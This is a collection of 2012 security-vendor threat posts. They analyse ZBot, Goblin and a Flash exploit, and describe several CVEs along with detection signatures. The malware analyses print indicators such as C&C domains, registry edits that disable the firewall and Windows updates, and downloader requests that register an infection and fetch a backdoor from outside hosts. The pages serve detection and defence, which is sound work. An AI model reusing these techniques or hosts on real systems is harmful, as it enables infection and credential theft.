New ZBot variant discovered in the wild (Apr 26, 2012)

/in /by

The SonicWALL Threats Research team discovered a new ZBot variant spreading in the wild. Through our analysis it was determined that this variant is aimed at stealing banking credentials from users in the UAE.

The Trojan makes the following DNS requests:

  • leadcloth.ru
  • datecoin.ru
  • acidblues.ru (C&C server)
  • steelray.com (C&C server)
  • danasrat.com
  • adbwer.com
  • janpollj.com
  • sahbara.com (C&C server)

The Trojan adds the following files to the filesystem:

  • %USERPROFILE%Local SettingsTemptmp7c2aa4f0umcc.exe [Detected as GAV: Zbot.YW_216 (Trojan)]
  • %USERPROFILE%Local SettingsTemptmpad242544.bat
  • %USERPROFILE%Application DataAwozaradasagq.exe [Detected as GAV: Zbot.YW_214 (Trojan)]
  • %USERPROFILE%Application DataMidymeeymmogu.tmp

tmpad242544.bat contains instructions to disable certain windows security features as seen below. It then deletes itself.

The Trojan adds the follwing key to the windows registry:

    Enable startup:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun {69834A20-7B82-9FD6-35FD-B1FA2A96E05E} “%USERPROFILE%Application DataAwozaradasagq.exe”

    • Bypass Windows Firewall:

  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyDomainProfileAuthorizedApplicationsList %windir%explorer.exe “%windir%explorer.exe”
  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList %windir%explorer.exe “%windir%explorer.exe”

The Trojan modifies the following registry keys:

    Disable Windows Security Center:

  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswscsvc Start dword:00000004

    • Disable Windows Automatic Updates:

  • HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv dword:00000004

    • Disable internet security policy:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones 1609 dword:00000000
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones1 1406 dword:00000000
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones1 1609 dword:00000000
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones2 1609 dword:00000000
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones3 1406 dword:00000000
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones3 1609 dword:00000000
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones4 1406 dword:00000000
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones4 1609 dword:00000000

The Trojan injects code into explorer.exe and causes it to perform the following tasks:

It downloads and runs umcc.exe [Detected as GAV: Zbot.YW_216 (Trojan)]

It posts sensitive system info to a remote C&C server and receives an encrypted Zbot configuration file in response:

The encrypted configuration file contains banking URL’s, browser user agent strings, C&C server addresses and various other instructions for the bot. Below is a sample of strings found in this file:

      "rakbankonline.ae/4rp/"
      "http://datecoin.ru/us.php"
      "http://acidblues.ru/wallst.php"
      "http://leadcloth.ru/yukon.php"
      "Welcome to HSBC"
      "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Zbot.YW_214 (Trojan)
  • GAV: Zbot.YW_216 (Trojan)

New Adobe Flash Player exploit (May 4, 2012)

/in /by

SonicWALL Threats Research team observed a new Flash exploit in the wild targeting the recently patched Adobe Flash Player vulnerability – CVE-2012-0779.

The exploit arrives as an e-mail attachment and if the user opens the document it will attempt to exploit the newly patched Adobe Flash Player vulnerability. Upon successful run, it will drop and run additional malware on the victim machine.

The specially crafted document will invoke Microsoft Internet Explorer in the background to download a malicious SWF exploit file from a remote compromised server located in Korea:

The HTTP request to the remote server contains information about the compromised host name and the offset at which the malicious executable is embedded inside the document. The response contains a compressed SWF exploit file which has an ActionScript payload encrypted via DoSWF.

A quick look at the SWF exploit file metadata shows the User account & Author website information used to encrypt this file:

The embedded executable file inside the document is XOR’ed using 0x85 key and is a Downloader Trojan:

The Downloader Trojan was dropped and executed upon successful exploit run. It registers the infection on a remote site and downloads a Backdoor Trojan. 

     GET /register/log.asp?isnew=-1&LocalInfo=(Operating System Information)&szHostName=(HOSTNAME)&tmp3=tmp3 Host: dextsolution.com  GET /Include/lib/ps.exe [ Detected as PcClient.NGO_3 (Trojan) ] Host: www.multicodec.co.kr

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: CVE-2012-0779.dc (Exploit)
  • GAV: CVE-2012-0779#swf (Exploit)
  • GAV: Mdrop.DOI (Trojan)
  • GAV: PcClient.NGO_3 (Trojan)

SonicWALL Intrusion Prevention system provides protection against this threat via the following signatures:

  • 7772 – Adobe Flash Player Object Confusion Exploit 1
  • 7773 – Adobe Flash Player Object Confusion Exploit 2

Goblin File Infector spreading in the wild (May 11, 2012)

/in /by

SonicWALL UTM Research team discovered a new variant of Goblin/Xpaj File Infector Virus spreading though malicious links in the wild. This Virus was found infecting various files on the target computer and contacting a remote command and control server.

We discovered the following on analysis of the Virus:

  • It creates the following copies of itself:
    • %temp%FB.tmp [Detected as GAV: Goblin.G (Virus)]
    • %temp%FC.tmp [Detected as GAV: Goblin.G (Virus)]
    • %temp%FD.tmp [Detected as GAV: Goblin.G (Virus)]

  • It creates the following mutexes:
    • aoki
    • kcade

  • It searches through %programfiles% and %windir% directories in order to identify files for infection

  • It copies files identified for infection to %temp%.tmp, modifies it with malicious code and replaces the original file with the modified version

  • It checks for connectivity to the internet by querying microsoft.com

  • It posts data to a remote server command and control server:

    screenshot

  • It queries the following list of domains generated using a pre-determined algorithm:
    • aqjxite.com
    • bearwy.com
    • bfsxwjndcpj.com
    • bitubkxrybs.com
    • epjfdpstt.com
    • htwxsxd.com
    • iwlgnuz.com
    • kqjzmbgwli.com
    • lnbywuduxby.com
    • nrgrbhm.com
    • tuhxlfbqu.com
    • uoliqbysup.com
    • vlxmzlko.com
    • xnidyek.com
    • ygyame.com
    • zzayzoabsi.com

  • It has functionality to download additional malware

SonicWALL Gateway AntiVirus provides protection against this threat with the following signatures:

  • GAV: Goblin.G (Virus)

Oracle GlassFish Administration Console XSS (May 4, 2012)

/in /by

GlassFish is an open-source application server project started by Sun Microsystems for the Java EE platform and now sponsored by Oracle Corporation. It is the reference implementation of Java EE and as such supports Enterprise JavaBeans, JPA, JavaServer Faces, JMS, RMI, JavaServer Pages, servlets, etc. The Administration Console provided in Oracle GlassFish is a browser-based utility that features a graphical interface for administrative tasks. By default, The Administration Console listens on TCP port 4848.

Multiple cross site scripting vulnerabilities have been reported in Oracle GlassFish Administration Console. Specifically, several JavaServer Faces resources in the Administration Console do not properly sanitize incoming request parameter values before rendering page output.

An attacker could exploit this vulnerability by embedding malicious script code in a URL and enticing the target user to open the URL in the browser. Successful exploitation would allow the attacker to steal the target user’s private information, such as the username, password and session cookie. The attacker may use the credential to grant full access to administrator’s account and the underlying GlassFish server.

The vulnerability has been assigned as CVE-2012-0551.

SonicWALL has released multiple IPS signatures to detect and block specific exploitation attempts targeting this vulnerability. The signatures are listed below:

  • 7762 Oracle GlassFish Administration Console XSS 1
  • 7763 Oracle GlassFish Administration Console XSS 2
  • 7764 Oracle GlassFish Administration Console XSS 3

LANDesk ThinkManagement File Deletion (April 27, 2012)

/in /by

LANDesk Lenovo ThinkManagement Suite is an application for monitoring and maintaining the availability of devices on the network. It forms the foundation of other LANDesk products such as Lenovo Hardware Password Manager, Security Suite, and Antivirus. ThinkManagement Console includes a web-based console, health dashboard and monitoring, scheduled task view, remote control, software license monitoring, performance monitoring, agentless device management, and reporting.

The main component of the ThinkManagement Suite is Core Server through which all of ThinkManagement’s files and services are provided. The Core Server hosts a variety of LANDesk services, a web service and provides a connection to the management database. It exposes the VulCore.asmx web service on the target server. VulCore.asmx is responsible for processing vulnerability scan requests and uses the LDAppVulnerability application pool. This service can be accessed remotely without requiring any authentication or authorization by sending SOAP HTTP requests to the resource. The following sample HTTP request illustrates the use of a SOAP header: 

 POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1 SOAPAction: "http://testing.com/RunAMTCommand"                 1111       1       testfile.txt

The default folder permission allow remote invocation of VulCore.asmx without any authentication. Some of the web methods exposed by VulCore.asmx that can be passed in the SOAPAction header are shown: 

 GetPatchesForGroup() PutVulnerabilityResults() SendRunStatus() SetPatchInstallStatus2() SetTaskLog() SetTaskLogByFile()

The SetTaskLogByFile method’s prototype is shown: 

public void SetTaskLogByFile(int computerIdn, int taskid, string filename)

A directory traversal vulnerability exists in the Core Server component of LANDesk Lenovo ThinkManagement Suite. The vulnerability is created by a lack of proper sanitization of parameters in SOAP requests containing the SetTaskLogByFile web method of the service. The vulnerable code does not verify the filename parameter, allowing remote attackers to remove any file under the C:Program FilesLANDeskManagementSuiteIdlogon directory by prepending a directory traversal character sequence to the specified filename. Remote, unauthenticated attackers could exploit this vulnerability by sending crafted SOAP requests to the VulCore.asmx resource with a malicious filename parameter value of the SetTaskLogByFile method. Successful exploitation allows the attacker to delete arbitrary files on the target host. This can lead to a denial of service condition if important executables and libraries are deleted.

SonicWALL has released the following IPS signatures to address this issue:

  • 7754 – Lenovo ThinkManagement Console Directory Traversal
  • 7699 – Lenovo ThinkManagement Console Arbitrary File Overwrite

The vulnerability has been assigned CVE-2012-1196 by mitre.

IBM Tivoli ActiveX Buffer Overflow (April 20, 2012)

/in /by

IBM Tivoli Provisioning Manager Express automates management of software distribution. It helps identify non-compliant users and deploy software updates to reduce user downtime and the need for support. IBM Tivoli Provisioning Manager Express runs a web service which allows clients to upload files to the server using Internet Explorer via an ActiveX control. The functionality is provided by the Isig.isigCtl.1 ActiveX control, contained in the library isig.dll. The library will be installed and registered on the client system when a user requests a file upload. The ActiveX control is associated by CLSID 84B74E82-3475-420E-9949-773B4FB91771, and ProgID Isig.isigCtl. The control is scriptable and can be instantiated via a web page. Example code snippets of instantiation follow: 

  

 or 


 testobject = new ActiveXObject("Isig.isigCtl") 


 The ActiveX control exposes multiple methods, one of which is RunAndUploadFile with the following prototype: 


 RunAndUploadFile (string url, string otherfields, string flags) 


  The otherfields parameter is expected to contain multiple name:value pairs separated by semicolons. 


 A stack-based buffer overflow vulnerability exists in some versions of IBM Tivoli Provisioning Manager Express for Software Distribution. Specifically, the vulnerability is due to improper handling of the otherfields parameter passed to the RunAndUploadFile method of the Isig.isigCtl ActiveX control. The name:value pairs in the otherfields parameter are processed one by one in order to construct Content-Disposition HTTP headers. Each header value is built from one name:value pair. The vulnerable code calls a sprintf function using a format string similar to the following: 


 --%sContent-Disposition: form-data; name="%s" 


 Where the second modifier is controlled by the name field of each name:value pair of the otherfields parameter. The first modifier will be replaced with a fixed length string. The value field of each name:value pair is then concatenated to the same buffer using a strcat function. Since the destination buffer for holding the output is a fixed size stack buffer, supplying a longer string to the otherfields parameter can overwrite critical data on the stack.  


 A remote attacker could exploit this vulnerability via a web page that passes a large crafted argument to the vulnerable ActiveX control method. In order to exploit the vulnerability, the target user needs to be enticed to visit the malicious web page. Successful exploitation will result in a buffer overflow that may divert the process flow of the vulnerable service. 


 SonicWALL has released an IPS signature addressing this issue. The following signature was released: 


    

  • 7685 – IBM Tivoli Isig.isigCtl.1 ActiveX RunAndUploadFile Method Invocation
    • 



 In addition to the signature released specifically for this particular vulnerability, SonicWALL has numerous existing signatures that cover known generic attack traffic that is likely to be employed in an attack targeting this flaw. These signatures are proactively preventing attacks targeting known and previously undisclosed vulnerabilities. 


 The vendor has released an advisory regarding this issue.
 The flaw was first disclosed by ZDI in this advisory.
 This vulnerability has been assigned CVE-2012-0198 by mitre.


	Oracle JRE Sandbox Restriction Bypass – Flashback Trojan (Apr 5, 2012)				
/in  /by 
Java is a programming language originally developed by James Gosling at Sun Microsystems (which has since merged into Oracle Corporation) and released in 1995 as a core component of Sun Microsystems’ Java platform. Java is a general-purpose, concurrent, class-based, object-oriented language that is specifically designed to have as few implementation dependencies as possible. Java is currently one of the most popular programming languages in use, particularly for client-server web applications, with a reported 10 million users. 


Java applications are typically compiled to bytecode (class file) that can run on any Java Virtual Machine (JVM) regardless of computer architecture. Therefore, JVM can be supported by any browser like IE, Firefox, Google Chrome and Safari with any operating system such as Windows, Linux, MacOS and so on. A Java applet is a Java application delivered to users in the form of Java bytecode. Java applets are executed in a sandbox, preventing them from accessing local data like the clipboard or file system. 


The base Java Security sandbox is comprised of three major components: the byte code Verifier, the Class Loader, and the Security Manager. Each of these components must work properly in order for Java to perform in a secure fashion. Type safety is the most essential element of Java’s security. Type safety means that a program cannot perform an operation on an object unless that operation is valid for that object. 


There is a type safety vulnerability in the Java Runtime Environment. The vulnerable version of the JVM does not properly check the object type. A malicious Java application or applet could use this flaw to cause the Java Virtual Machine to crash or bypass the Java sandbox restrictions. Successful exploitation of this vulnerability allows a Java applet to bypass JVM sandbox restrictions and achieve execution with full privileges. 


Multiple virus variants taking use of this vulnerability have been observed in the wild. The viruses have been named as Flashback Trojan, and it has been reported affected hundreds of thousands of Macs. SonicWALL UTM team has researched this vulnerability and created the following IPS and GAV signatures to cover both the vulnerability and the active viruses in the wild. 


    

  • IPS: 7661 Oracle JRE AtomicReferenceArray Sandbox Restriction Bypass
    • 

  • GAV: 31909    MacOSX.Flashback.E
    • 

  • GAV: 51475    MacOSX.Flashback.A
    • 

  • GAV: 31902    MacOSX.Flashback.G
    • 

  • GAV: 51945    MacOSX.Flashback.C
    • 



This vulnerability has been referred by CVE as  CVE-2012-0507.


	Microsoft Security Bulletin Coverage (March 14, 2012)				
/in  /by 
SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of March, 2012. A list of issues reported, along with SonicWALL coverage information follows:


 MS12-017 Vulnerability in DNS Server Could Allow Denial of Service (2647170) 


    

  •  		CVE-2012-0006 DNS Denial of Service Vulnerability
     		Malicious traffic is indistinguishable from normal DNS traffic. 	
    • 



 MS12-018 Vulnerability in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2641653) 


    

  •  		CVE-2012-0157 PostMessage Function Vulnerability
     		This is a local vulnerability. Attacks are not detectable over the network. 	
    • 



 MS12-019 Vulnerability in DirectWrite Could Allow Denial of Service (2665364) 


    

  •  		CVE-2012-0156 DirectWrite Application Denial of Service Vulnerability
     		No coverage is available. 	
    • 



 MS12-020 Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) 


    

  •  		CVE-2012-0002 Remote Desktop Protocol Vulnerability
     		IPS: 4178 – Suspicious RDP Traffic 3
     		IPS: 4186 – Suspicious RDP Traffic 4 	
    • 

  •  		CVE-2012-0152 Terminal Server Denial of Service Vulnerability
     		This kind of attack is not detectable by SonicWALL. 	
    • 



 MS12-021 Vulnerability in Visual Studio Could Allow Elevation of Privilege (2651019) 


    

  •  		CVE-2012-0008 Visual Studio Add-In Vulnerability
     		This is a local vulnerability. Attacks are not detectable over the network. 	
    • 



 MS12-022 Vulnerability in Expression Design Could Allow Remote Code Execution (2651018) 


    

  •  		CVE-2012-0016 Expression Design Insecure Library Loading Vulnerability
     		IPS: 1023 – Binary Planting Attempt 1
     		IPS: 5726 – Binary Planting Attempt 2
     		IPS: 6847 – Binary Planting Attempt 3 	
    • 



	IBM Tivoli Provisioning Manager Express SQL Injection (Mar 29, 2012)				
/in  /by 
The purpose of IBM Tivoli Provisioning Manager Express is to automate the provisioning of virtual servers and software. It helps identifying non-compliant users and quickly deploying critical software updates to reduce end-user downtime.


  An SQL injection vulnerability exists in IBM Tivoli Provisioning Manager Express. Specifically, the vulnerability is due to lack of sanitation of user supplied parameters sent to the User.updateUserValue function in the register.do servlet. A remote attacker could exploit this vulnerability by sending crafted HTTP requests to the Tivoli Provisioning Manager Express server. Successful exploitation allows the attacker to grant Administrator privileges.


  The vulnerability has been assigned as CVE-2012-0199.


  SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:  


    

  • 7649 IBM Tivoli Provisioning Manager Express SQL Injection
    • 



	VideoLAN VLC Media Player mms Buffer Overflow (Mar 23, 2012)				
/in  /by 
VideoLAN VLC Media Player is an open source multimedia player. It can play various audio/video formats (MPEG, DivX, ogg, Wave etc.) as well as streaming protocols. It is highly portable and available for multiple platforms.


  VLC Media Player can be instructed to open media resources referred by URIs. A URI can be supplied to VLC Media Player by embedding it in a playlist file, such as an ASX (Advanced Stream Redirector) format playlist. In a URI, a “mms” scheme (often appears as “mms://path”) addresses Windows Media Services Streaming Protocol. The generic form of the mms URI parsed by VLC media player is as follows:


  mms://[[username[:password@]]hostname[:port][/path][&args…]


  A stack buffer overflow vulnerability exists in VideoLAN VLC Media Player. Specifically, the vulnerability is due to improper handling of the hostname field in “mms” URIs. An attacker can exploit this vulnerability by enticing a user to open a crafted playlist file. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the currently logged in user. Code injection that does not result in execution would terminate the application due to memory corruption.


  The vulnerability has been assigned as CVE-2012-1775.


  SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:  


    

  • 7622 VideoLAN VLC Media Player ASX Handling Buffer Overflow
    • 






				
				

				
			

		




						

	


			

			
				


					
		
		
		






				


					

						
Pin It on Pinterest